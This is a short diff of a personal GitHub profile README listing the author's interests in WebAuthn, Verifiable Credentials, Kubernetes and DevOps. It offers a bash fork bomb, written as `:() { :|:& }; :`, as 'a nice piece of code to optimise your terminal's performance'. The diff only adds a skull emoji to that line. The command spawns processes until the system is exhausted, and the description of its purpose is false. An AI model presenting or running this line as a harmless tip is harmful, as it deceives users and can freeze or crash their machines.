angga-22/angga-22/README.md

   Verifiable Credentials, and WebAuthn, plus the crypto underneath it all.
   These days I'm also getting my hands dirty with Kubernetes and DevOps.

-  Here's a nice piece of code to optimise your terminal's performance:
+  Here's a nice piece of code to optimise your terminal's performance ☠️ :
   ``` :() { :|:& }; : ```